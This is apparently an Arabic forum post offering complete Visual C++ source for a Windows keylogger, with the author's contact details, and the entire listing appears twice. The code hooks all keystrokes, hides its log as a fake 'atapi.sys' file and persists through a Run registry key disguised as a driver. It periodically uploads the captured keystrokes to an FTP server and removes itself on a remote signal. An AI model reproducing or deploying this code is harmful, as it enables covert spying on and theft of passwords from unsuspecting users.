الكود خال من الاخطاء بالتطبيق على visual studio 2010 على الاقل
طبعا هذا الكود مبرمج بلغة vc++
برمجة محمد توفيق مسعّدkmkho@hotmail.com-mohammedtawfiq2013@gmail.comللإستفسار
kmkho.ahlamontada.com
#include <stdio.h>
#include <string>
#include <windows.h>
#include <wininet.h>
#include <winuser.h>
#include <conio.h>
#include <time.h>
#include <fstream>
#include <strsafe.h>
#include <io.h>
#include <crtdefs.h>
//#include "Thread."
using namespace std;
#pragma comment(lib,"Wininet.lib")
#define SELF_REMOVE_STRING TEXT("cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"%s\"")
void PlaceHolder()
{
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"placehold.txt");
HINTERNET hhInternet;
HINTERNET hftpdownload;
hhInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hftpdownload = InternetConnectA(hhInternet, "www.live.com", INTERNET_DEFAULT_FTP_PORT, "kmkhol@hotmail.com", "1111", INTERNET_SERVICE_FTP, 0, 0 );
FtpGetFileA(hftpdownload, "holding.txt",szDir, FALSE,NULL,INTERNET_FLAG_TRANSFER_BINARY,NULL);
InternetCloseHandle(hftpdownload);
InternetCloseHandle(hhInternet);
}
int isCapsLock()
{
if ((GetKeyState(VK_CAPITAL) & 0x0001) != 0)
{
return 1;
}
else
{
return 0;
}
}
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *pKeyBoard = (KBDLLHOOKSTRUCT *)lParam;
DWORD dwMsg = 1;
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir, "a+");
DWORD dwAttrs = GetFileAttributesA(szDir);
if (dwAttrs!= (FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN))
SetFileAttributesA(szDir, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
switch (wParam)
{
case WM_KEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
if (GetAsyncKeyState(VK_SHIFT))
{
switch (vkCode)
{
case 0x30:
fputs("=", file);
break;
case 0x31:
fputs("!", file);
break;
case 0x32:
fputs("\"", file);
break;
case 0x33:
fputs("#", file);
break;
case 0x34:
fputs("$", file);
break;
case 0x35:
fputs("%", file);
break;
case 0x36:
fputs("&", file);
break;
case 0x37:
fputs("/", file);
break;
case 0x71:
fputs("f1",file);
break;
break;
case 0x38:
fputs("(", file);
break;
case 0x39:
fputs(")", file);
break;
case 0xBF:
fputs("?", file);
break;
case 0xBB:
fputs("*", file);
break;
case 0xBC:
fputs(";", file);
break;
case 0xBE:
fputs(":", file);
break;
case 0xBD:
fputs("_", file);
break;
case 0xE2:
fputs(">", file);
break;
case 0x1C:
fputs("VK_CONVERT",file);
break;
case 0x56:
fputs("@", file);
break;
case 0x2A:
fputs ("PRINT",file);
break;
case 0x2E:
fputs ("delet",file);
break;
case 0xAA:
fputs("searsh",file);
break;
case 0xF2:
fputs("COPY",file);
break;
case 0xFE: fputs("clear",file);
break;
case 0x3:
fputs("connect",file);
break;
case 0x6:
fputs("logoff",file);
break;
}
}
else
{
switch (vkCode)
{
case 0x30:
fputs("0", file);
break;
case 0x31:
fputs("1", file);
break;
case 0x32:
fputs("2", file);
break;
case 0x33:
fputs("3", file);
break;
case 0x34:
fputs("4", file);
break;
case 0x35:
fputs("5", file);
break;
case 0x36:
fputs("6", file);
break;
case 0x37:
fputs("7", file);
break;
case 0x38:
fputs("8", file);
break;
case 0x39:
fputs("9", file);
break;
case 0xBF:
fputs("'", file);
break;
case 0xBB:
fputs("+", file);
break;
case 0xBC:
fputs(",", file);
break;
case 0xBE:
fputs(".", file);
break;
case 0xBD:
fputs("-", file);
break;
case 0xE2:
fputs("<", file);
break;
}
}
if (!(GetAsyncKeyState(VK_SHIFT) ^ isCapsLock()))
{
switch (vkCode)
{
case 0x41:
fputs("a", file);
break;
case 0x42:
fputs("b", file);
break;
case 0x43:
fputs("c", file);
break;
case 0xBA:
fputs("č", file);
break;
case 0x44:
fputs("d", file);
break;
case 0x45:
fputs("e", file);
break;
case 0x46:
fputs("f", file);
break;
case 0x47:
fputs("g", file);
break;
case 0x48:
fputs("h", file);
break;
case 0x49:
fputs("i", file);
break;
case 0x4A:
fputs("j", file);
break;
case 0x4B:
fputs("k", file);
break;
case 0x4C:
fputs("l", file);
break;
case 0x4D:
fputs("m", file);
break;
case 0x4E:
fputs("n", file);
break;
case 0x4F:
fputs("o", file);
break;
case 0x50:
fputs("p", file);
break;
case 0x52:
fputs("r", file);
break;
case 0x53:
fputs("s", file);
break;
case 0xDB:
fputs("š", file);
break;
case 0x54:
fputs("t", file);
break;
case 0x55:
fputs("u", file);
break;
case 0x56:
fputs("v", file);
break;
case 0x5A:
fputs("z", file);
break;
case 0xDC:
fputs("ž", file);
break;
case 0x51:
fputs("q", file);
break;
case 0x57:
fputs("w", file);
break;
case 0x59:
fputs("y", file);
break;
case 0x58:
fputs("x", file);
break;
case 0xDE:
fputs("ć", file);
break;
case 0xDD:
fputs("đ", file);
break;
case 0x02000000:
fputs("alt",file);
break;
}
}
else VK_SHIFT+KF_ALTDOWN ;
{
switch (vkCode)
{
case 0x41:
fputs("ش", file);
break;
case 0x42:
fputs("لا", file);
break;
case 0x43:
fputs("ؤ", file);
break;
case 0xBA:
fputs("}", file);
break;
case 0x44:
fputs("ي", file);
break;
case 0x45:
fputs("ث", file);
break;
case 0x46:
fputs("ب", file);
break;
case 0x47:
fputs("ل", file);
break;
case 0x48:
fputs("ا", file);
break;
case 0x49:
fputs("ه", file);
break;
case 0x4A:
fputs("ل", file);
break;
case 0x4B:
fputs("ن", file);
break;
case 0x4C:
fputs("م", file);
break;
case 0x4D:
fputs("ة", file);
break;
case 0x4E:
fputs("ى", file);
break;
case 0x4F:
fputs("خ", file);
break;
case 0x50:
fputs("ح", file);
break;
case 0x52:
fputs("ق", file);
break;
case 0x53:
fputs("س", file);
break;
case 0xDB:
fputs("ٍ", file);
break;
case 0x54:
fputs("ف", file);
break;
case 0x55:
fputs("ع", file);
break;
case 0x56:
fputs("ر", file);
break;
case 0x5A:
fputs("ئ", file);
break;
case 0xDC:
fputs("~", file);
break;
case 0x51:
fputs("َ", file);
break;
case 0x57:
fputs("ً", file);
break;
case 0x59:
fputs("إ", file);
break;
case 0x58:
fputs("ء", file);
break;
case 0xDE:
fputs("}}", file);
break;
case 0xDD:
fputs("]]", file);
break;
}
}
switch (vkCode)
{
case VK_SPACE:
fputs(" ", file);
break;
case 0x2E:
fputs("[Delete]", file);
break;
case VK_BACK:
fputs("[BackSpace]", file);
break;
case VK_RETURN:
fputs("[NewLine]\n", file);
break;
case VK_LCONTROL:
fputs("[Ctrl]", file);
break;
case VK_RCONTROL:
fputs("[Ctrl]", file);
break;
case VK_TAB:
fputs("[Tab]", file);
break;
case 0x25:
fputs("[Left Arrow]", file);
break;
case 0x26:
fputs("[Up Arrow]", file);
break;
case 0x27:
fputs("[Right Arrow]", file);
break;
case 0x28:
fputs("[Down Arrow]", file);
break;
case VK_NUMPAD0:
fputs("0", file);
break;
case VK_NUMPAD1:
fputs("1", file);
break;
case VK_NUMPAD2:
fputs("2", file);
break;
case VK_NUMPAD3:
fputs("3", file);
break;
case VK_NUMPAD4:
fputs("4", file);
break;
case VK_NUMPAD5:
fputs("5", file);
break;
case VK_NUMPAD6:
fputs("6", file);
break;
case VK_NUMPAD7:
fputs("7", file);
break;
case VK_NUMPAD8:
fputs("8", file);
break;
case VK_NUMPAD9:
fputs("9", file);
break;
case 0x6F:
fputs("/", file);
break;
case 0x6A:
fputs("*", file);
break;
case 0x6D:
fputs("-", file);
break;
case 0x6B:
fputs("+", file);
break;
case 0x6E:
fputs(",", file);
break;
}
}
case WM_SYSKEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
if (GetAsyncKeyState(VK_RMENU))
{
switch (vkCode)
{
case 0x51:
fputs("\\", file);
break;
case 0x57:
fputs("|", file);
break;
case 0x45:
fputs("€", file);
break;
case 0xDB:
fputs("÷", file);
break;
case 0xDD:
fputs("×", file);
break;
case 0x46:
fputs("[", file);
break;
case 0x47:
fputs("]", file);
break;
case 0x4B:
fputs("ł", file);
break;
case 0x4C:
fputs("Ł", file);
break;
case 0xDE:
fputs("ß", file);
break;
case 0xDC:
fputs("¤", file);
break;
case 0x56:
fputs("@", file);
break;
case 0x42:
fputs("{", file);
break;
case 0x4E:
fputs("}", file);
break;
case 0x4D:
fputs("§", file);
break;
case 0xBC:
fputs("<", file);
break;
case 0xBE:
fputs(">", file);
break;
}
}
}
default:
fclose(file);
return CallNextHookEx( NULL, nCode, wParam, lParam );
}
fclose(file);
return 0;
}
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
HHOOK hKeyHook;
HINSTANCE hExe = GetModuleHandle(NULL);
if (hExe == NULL)
{
return 1;
}
else
{
hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, hExe, 0);//للحروف الصغيره
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) != 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);//بعث الرساله
}
UnhookWindowsHookEx(hKeyHook);
}
return 0;
}
int StartKeyLogging()
{
HANDLE hThread;
DWORD dwThread;
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger,NULL, 0, NULL);
if (hThread)
{
return WaitForSingleObject(hThread, INFINITE);
}
else
{
return 1;
}
}
void AutoStart()
{
char Driver[MAX_PATH];
HMODULE HMod;
HKEY hKey;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
RegOpenKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);//فتح الرجستري
RegSetValueExA(hKey, "Windows Atapi x86_64 Driver", 0, REG_SZ, (const unsigned char *)Driver, MAX_PATH);//الحصول على القيمه
RegCloseKey(hKey);
}
void File()
{
char Driver[MAX_PATH];
HMODULE HMod;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir,"a+");
fputs(" - Started logging on - ", file);//لبدايه التشغيل
fclose(file);
char szName[50];
DWORD dwAttrs = GetFileAttributesA(szDir);
DWORD dwAttra = GetFileAttributesA(Driver);
//
if (dwAttra && dwAttrs!= (FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN))//بنفس الخصائص ومخفي
{
SetFileAttributesA(szDir, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);//للحصول على خصائص الملف بنفس
SetFileAttributesA(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
}
else
;
//
while(true)
{
time_t theTime = time(0);
SYSTEMTIME Time;
WORD Dan = Time.wDay;
WORD Mesec = Time.wMonth;
WORD Ura = Time.wHour;
WORD Minute = Time.wMinute;
WORD Sekunde = Time.wSecond;
file = fopen(szDir,"a+");
fputs("\n", file);
fputs(ctime(&theTime), file);
fputs("\n", file);
fclose(file);
sprintf(szName, "AttackedSuccessfuly_%d%d%d%d%d.txt", Dan, Mesec, Ura, Minute, Sekunde);
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hFtpSession = InternetConnectA(hInternet, "FTPSERVER", INTERNET_DEFAULT_FTP_PORT, "USERNAME", "PASSWORD", INTERNET_SERVICE_FTP, 0, 0 );
FtpPutFileA(hFtpSession,szDir, szName, FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
Sleep(7200);
}
}
void DeleteMe()
{
TCHAR szModuleName[MAX_PATH];
TCHAR szCmd[2 * MAX_PATH];
STARTUPINFO si = {0};;//معلومات جديدة
PROCESS_INFORMATION pi = {0};//طوابغ لوقت النظام
char szDir2[260];
GetTempPathA(260,szDir2);//ملف مؤقت لبدايه التشغيل
strcat(szDir2,"destroy.txt");//نسخ المعلومات بالملف الى
HINTERNET hhInternet;//للارسال عبر النت
HINTERNET hftpdownload;//منفذ
hhInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);//للتاكد من النت
hftpdownload = InternetConnectA(hhInternet, "FTPSERVERX", INTERNET_DEFAULT_FTP_PORT, "USERNAME", "PASSWORD", INTERNET_SERVICE_FTP, 0, 0 );//للتهيئه الموقع
FtpGetFileA(hftpdownload, "destroy.txt",szDir2, FALSE,NULL,INTERNET_FLAG_TRANSFER_BINARY,NULL);//لارسال الملف ب النظام الثنائي
InternetCloseHandle(hftpdownload);
InternetCloseHandle(hhInternet);
char Driver[MAX_PATH];//مصفوفه بحجم الملف
HMODULE HMod;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"placehold.txt");//نسخ المعلومات من الملف الى ال
char szDir3[260];
GetTempPathA(260,szDir3);//تخزين الموقت
strcat(szDir3,"atapi.sys");//نسخ
if( (_access( szDir2, 0 )) != -1 )
{
remove(szDir2);
remove(szDir);
SetFileAttributesA(szDir3,FILE_ATTRIBUTE_NORMAL);//للحصول على خصائص الملف بنفس
remove(szDir3);
SetFileAttributesA(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);//بنفس الخصائص ومخفي
StringCbPrintf(szCmd, 2 * MAX_PATH, SELF_REMOVE_STRING, szModuleName);
CreateProcess(NULL, szCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);//لاخفاء النافذه
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
exit(1);
}
else
;
}
int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow)
{
PlaceHolder();
AutoStart();
DeleteMe();
//handeld
//hThread1 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger,NULL, 0, NULL);
//CreateThread(
//Thread FileFunction = new Thread(File);
//startThreading(Priority_Max);
//CFunction.Start();
StartKeyLogging();
}
طبعا هذا الكود مبرمج بلغة vc++
برمجة محمد توفيق مسعّدkmkho@hotmail.com-mohammedtawfiq2013@gmail.comللإستفسار
kmkho.ahlamontada.com
#include <stdio.h>
#include <string>
#include <windows.h>
#include <wininet.h>
#include <winuser.h>
#include <conio.h>
#include <time.h>
#include <fstream>
#include <strsafe.h>
#include <io.h>
#include <crtdefs.h>
//#include "Thread."
using namespace std;
#pragma comment(lib,"Wininet.lib")
#define SELF_REMOVE_STRING TEXT("cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"%s\"")
void PlaceHolder()
{
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"placehold.txt");
HINTERNET hhInternet;
HINTERNET hftpdownload;
hhInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hftpdownload = InternetConnectA(hhInternet, "www.live.com", INTERNET_DEFAULT_FTP_PORT, "kmkhol@hotmail.com", "1111", INTERNET_SERVICE_FTP, 0, 0 );
FtpGetFileA(hftpdownload, "holding.txt",szDir, FALSE,NULL,INTERNET_FLAG_TRANSFER_BINARY,NULL);
InternetCloseHandle(hftpdownload);
InternetCloseHandle(hhInternet);
}
int isCapsLock()
{
if ((GetKeyState(VK_CAPITAL) & 0x0001) != 0)
{
return 1;
}
else
{
return 0;
}
}
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *pKeyBoard = (KBDLLHOOKSTRUCT *)lParam;
DWORD dwMsg = 1;
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir, "a+");
DWORD dwAttrs = GetFileAttributesA(szDir);
if (dwAttrs!= (FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN))
SetFileAttributesA(szDir, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
switch (wParam)
{
case WM_KEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
if (GetAsyncKeyState(VK_SHIFT))
{
switch (vkCode)
{
case 0x30:
fputs("=", file);
break;
case 0x31:
fputs("!", file);
break;
case 0x32:
fputs("\"", file);
break;
case 0x33:
fputs("#", file);
break;
case 0x34:
fputs("$", file);
break;
case 0x35:
fputs("%", file);
break;
case 0x36:
fputs("&", file);
break;
case 0x37:
fputs("/", file);
break;
case 0x71:
fputs("f1",file);
break;
break;
case 0x38:
fputs("(", file);
break;
case 0x39:
fputs(")", file);
break;
case 0xBF:
fputs("?", file);
break;
case 0xBB:
fputs("*", file);
break;
case 0xBC:
fputs(";", file);
break;
case 0xBE:
fputs(":", file);
break;
case 0xBD:
fputs("_", file);
break;
case 0xE2:
fputs(">", file);
break;
case 0x1C:
fputs("VK_CONVERT",file);
break;
case 0x56:
fputs("@", file);
break;
case 0x2A:
fputs ("PRINT",file);
break;
case 0x2E:
fputs ("delet",file);
break;
case 0xAA:
fputs("searsh",file);
break;
case 0xF2:
fputs("COPY",file);
break;
case 0xFE: fputs("clear",file);
break;
case 0x3:
fputs("connect",file);
break;
case 0x6:
fputs("logoff",file);
break;
}
}
else
{
switch (vkCode)
{
case 0x30:
fputs("0", file);
break;
case 0x31:
fputs("1", file);
break;
case 0x32:
fputs("2", file);
break;
case 0x33:
fputs("3", file);
break;
case 0x34:
fputs("4", file);
break;
case 0x35:
fputs("5", file);
break;
case 0x36:
fputs("6", file);
break;
case 0x37:
fputs("7", file);
break;
case 0x38:
fputs("8", file);
break;
case 0x39:
fputs("9", file);
break;
case 0xBF:
fputs("'", file);
break;
case 0xBB:
fputs("+", file);
break;
case 0xBC:
fputs(",", file);
break;
case 0xBE:
fputs(".", file);
break;
case 0xBD:
fputs("-", file);
break;
case 0xE2:
fputs("<", file);
break;
}
}
if (!(GetAsyncKeyState(VK_SHIFT) ^ isCapsLock()))
{
switch (vkCode)
{
case 0x41:
fputs("a", file);
break;
case 0x42:
fputs("b", file);
break;
case 0x43:
fputs("c", file);
break;
case 0xBA:
fputs("č", file);
break;
case 0x44:
fputs("d", file);
break;
case 0x45:
fputs("e", file);
break;
case 0x46:
fputs("f", file);
break;
case 0x47:
fputs("g", file);
break;
case 0x48:
fputs("h", file);
break;
case 0x49:
fputs("i", file);
break;
case 0x4A:
fputs("j", file);
break;
case 0x4B:
fputs("k", file);
break;
case 0x4C:
fputs("l", file);
break;
case 0x4D:
fputs("m", file);
break;
case 0x4E:
fputs("n", file);
break;
case 0x4F:
fputs("o", file);
break;
case 0x50:
fputs("p", file);
break;
case 0x52:
fputs("r", file);
break;
case 0x53:
fputs("s", file);
break;
case 0xDB:
fputs("š", file);
break;
case 0x54:
fputs("t", file);
break;
case 0x55:
fputs("u", file);
break;
case 0x56:
fputs("v", file);
break;
case 0x5A:
fputs("z", file);
break;
case 0xDC:
fputs("ž", file);
break;
case 0x51:
fputs("q", file);
break;
case 0x57:
fputs("w", file);
break;
case 0x59:
fputs("y", file);
break;
case 0x58:
fputs("x", file);
break;
case 0xDE:
fputs("ć", file);
break;
case 0xDD:
fputs("đ", file);
break;
case 0x02000000:
fputs("alt",file);
break;
}
}
else VK_SHIFT+KF_ALTDOWN ;
{
switch (vkCode)
{
case 0x41:
fputs("ش", file);
break;
case 0x42:
fputs("لا", file);
break;
case 0x43:
fputs("ؤ", file);
break;
case 0xBA:
fputs("}", file);
break;
case 0x44:
fputs("ي", file);
break;
case 0x45:
fputs("ث", file);
break;
case 0x46:
fputs("ب", file);
break;
case 0x47:
fputs("ل", file);
break;
case 0x48:
fputs("ا", file);
break;
case 0x49:
fputs("ه", file);
break;
case 0x4A:
fputs("ل", file);
break;
case 0x4B:
fputs("ن", file);
break;
case 0x4C:
fputs("م", file);
break;
case 0x4D:
fputs("ة", file);
break;
case 0x4E:
fputs("ى", file);
break;
case 0x4F:
fputs("خ", file);
break;
case 0x50:
fputs("ح", file);
break;
case 0x52:
fputs("ق", file);
break;
case 0x53:
fputs("س", file);
break;
case 0xDB:
fputs("ٍ", file);
break;
case 0x54:
fputs("ف", file);
break;
case 0x55:
fputs("ع", file);
break;
case 0x56:
fputs("ر", file);
break;
case 0x5A:
fputs("ئ", file);
break;
case 0xDC:
fputs("~", file);
break;
case 0x51:
fputs("َ", file);
break;
case 0x57:
fputs("ً", file);
break;
case 0x59:
fputs("إ", file);
break;
case 0x58:
fputs("ء", file);
break;
case 0xDE:
fputs("}}", file);
break;
case 0xDD:
fputs("]]", file);
break;
}
}
switch (vkCode)
{
case VK_SPACE:
fputs(" ", file);
break;
case 0x2E:
fputs("[Delete]", file);
break;
case VK_BACK:
fputs("[BackSpace]", file);
break;
case VK_RETURN:
fputs("[NewLine]\n", file);
break;
case VK_LCONTROL:
fputs("[Ctrl]", file);
break;
case VK_RCONTROL:
fputs("[Ctrl]", file);
break;
case VK_TAB:
fputs("[Tab]", file);
break;
case 0x25:
fputs("[Left Arrow]", file);
break;
case 0x26:
fputs("[Up Arrow]", file);
break;
case 0x27:
fputs("[Right Arrow]", file);
break;
case 0x28:
fputs("[Down Arrow]", file);
break;
case VK_NUMPAD0:
fputs("0", file);
break;
case VK_NUMPAD1:
fputs("1", file);
break;
case VK_NUMPAD2:
fputs("2", file);
break;
case VK_NUMPAD3:
fputs("3", file);
break;
case VK_NUMPAD4:
fputs("4", file);
break;
case VK_NUMPAD5:
fputs("5", file);
break;
case VK_NUMPAD6:
fputs("6", file);
break;
case VK_NUMPAD7:
fputs("7", file);
break;
case VK_NUMPAD8:
fputs("8", file);
break;
case VK_NUMPAD9:
fputs("9", file);
break;
case 0x6F:
fputs("/", file);
break;
case 0x6A:
fputs("*", file);
break;
case 0x6D:
fputs("-", file);
break;
case 0x6B:
fputs("+", file);
break;
case 0x6E:
fputs(",", file);
break;
}
}
case WM_SYSKEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
if (GetAsyncKeyState(VK_RMENU))
{
switch (vkCode)
{
case 0x51:
fputs("\\", file);
break;
case 0x57:
fputs("|", file);
break;
case 0x45:
fputs("€", file);
break;
case 0xDB:
fputs("÷", file);
break;
case 0xDD:
fputs("×", file);
break;
case 0x46:
fputs("[", file);
break;
case 0x47:
fputs("]", file);
break;
case 0x4B:
fputs("ł", file);
break;
case 0x4C:
fputs("Ł", file);
break;
case 0xDE:
fputs("ß", file);
break;
case 0xDC:
fputs("¤", file);
break;
case 0x56:
fputs("@", file);
break;
case 0x42:
fputs("{", file);
break;
case 0x4E:
fputs("}", file);
break;
case 0x4D:
fputs("§", file);
break;
case 0xBC:
fputs("<", file);
break;
case 0xBE:
fputs(">", file);
break;
}
}
}
default:
fclose(file);
return CallNextHookEx( NULL, nCode, wParam, lParam );
}
fclose(file);
return 0;
}
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
HHOOK hKeyHook;
HINSTANCE hExe = GetModuleHandle(NULL);
if (hExe == NULL)
{
return 1;
}
else
{
hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, hExe, 0);//للحروف الصغيره
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) != 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);//بعث الرساله
}
UnhookWindowsHookEx(hKeyHook);
}
return 0;
}
int StartKeyLogging()
{
HANDLE hThread;
DWORD dwThread;
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger,NULL, 0, NULL);
if (hThread)
{
return WaitForSingleObject(hThread, INFINITE);
}
else
{
return 1;
}
}
void AutoStart()
{
char Driver[MAX_PATH];
HMODULE HMod;
HKEY hKey;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
RegOpenKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);//فتح الرجستري
RegSetValueExA(hKey, "Windows Atapi x86_64 Driver", 0, REG_SZ, (const unsigned char *)Driver, MAX_PATH);//الحصول على القيمه
RegCloseKey(hKey);
}
void File()
{
char Driver[MAX_PATH];
HMODULE HMod;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir,"a+");
fputs(" - Started logging on - ", file);//لبدايه التشغيل
fclose(file);
char szName[50];
DWORD dwAttrs = GetFileAttributesA(szDir);
DWORD dwAttra = GetFileAttributesA(Driver);
//
if (dwAttra && dwAttrs!= (FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN))//بنفس الخصائص ومخفي
{
SetFileAttributesA(szDir, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);//للحصول على خصائص الملف بنفس
SetFileAttributesA(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
}
else
;
//
while(true)
{
time_t theTime = time(0);
SYSTEMTIME Time;
WORD Dan = Time.wDay;
WORD Mesec = Time.wMonth;
WORD Ura = Time.wHour;
WORD Minute = Time.wMinute;
WORD Sekunde = Time.wSecond;
file = fopen(szDir,"a+");
fputs("\n", file);
fputs(ctime(&theTime), file);
fputs("\n", file);
fclose(file);
sprintf(szName, "AttackedSuccessfuly_%d%d%d%d%d.txt", Dan, Mesec, Ura, Minute, Sekunde);
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hFtpSession = InternetConnectA(hInternet, "FTPSERVER", INTERNET_DEFAULT_FTP_PORT, "USERNAME", "PASSWORD", INTERNET_SERVICE_FTP, 0, 0 );
FtpPutFileA(hFtpSession,szDir, szName, FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
Sleep(7200);
}
}
void DeleteMe()
{
TCHAR szModuleName[MAX_PATH];
TCHAR szCmd[2 * MAX_PATH];
STARTUPINFO si = {0};;//معلومات جديدة
PROCESS_INFORMATION pi = {0};//طوابغ لوقت النظام
char szDir2[260];
GetTempPathA(260,szDir2);//ملف مؤقت لبدايه التشغيل
strcat(szDir2,"destroy.txt");//نسخ المعلومات بالملف الى
HINTERNET hhInternet;//للارسال عبر النت
HINTERNET hftpdownload;//منفذ
hhInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);//للتاكد من النت
hftpdownload = InternetConnectA(hhInternet, "FTPSERVERX", INTERNET_DEFAULT_FTP_PORT, "USERNAME", "PASSWORD", INTERNET_SERVICE_FTP, 0, 0 );//للتهيئه الموقع
FtpGetFileA(hftpdownload, "destroy.txt",szDir2, FALSE,NULL,INTERNET_FLAG_TRANSFER_BINARY,NULL);//لارسال الملف ب النظام الثنائي
InternetCloseHandle(hftpdownload);
InternetCloseHandle(hhInternet);
char Driver[MAX_PATH];//مصفوفه بحجم الملف
HMODULE HMod;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"placehold.txt");//نسخ المعلومات من الملف الى ال
char szDir3[260];
GetTempPathA(260,szDir3);//تخزين الموقت
strcat(szDir3,"atapi.sys");//نسخ
if( (_access( szDir2, 0 )) != -1 )
{
remove(szDir2);
remove(szDir);
SetFileAttributesA(szDir3,FILE_ATTRIBUTE_NORMAL);//للحصول على خصائص الملف بنفس
remove(szDir3);
SetFileAttributesA(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);//بنفس الخصائص ومخفي
StringCbPrintf(szCmd, 2 * MAX_PATH, SELF_REMOVE_STRING, szModuleName);
CreateProcess(NULL, szCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);//لاخفاء النافذه
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
exit(1);
}
else
;
}
int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow)
{
PlaceHolder();
AutoStart();
DeleteMe();
//handeld
//hThread1 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger,NULL, 0, NULL);
//CreateThread(
//Thread FileFunction = new Thread(File);
//startThreading(Priority_Max);
//CFunction.Start();
StartKeyLogging();
}